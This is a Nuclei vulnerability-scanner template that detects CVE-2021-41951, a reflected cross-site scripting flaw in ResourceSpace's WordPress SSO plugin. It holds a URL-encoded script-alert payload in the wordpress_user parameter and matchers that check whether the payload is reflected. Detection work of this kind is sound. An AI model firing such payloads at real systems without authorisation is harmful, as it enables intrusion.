nuclei-templates/cves/2021/CVE-2021-41951.yaml

39 lines
1.0 KiB
YAML

id: CVE-2021-41951
info:
name: Resourcespace - Cross-Site Scripting
author: coldfish
severity: medium
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
reference:
- https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/
- https://nvd.nist.gov/vuln/detail/CVE-2021-41951
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-41951
cwe-id: CWE-79
tags: cve,cve2021,xss,resourcespace
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "TEST<script>alert(1)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/27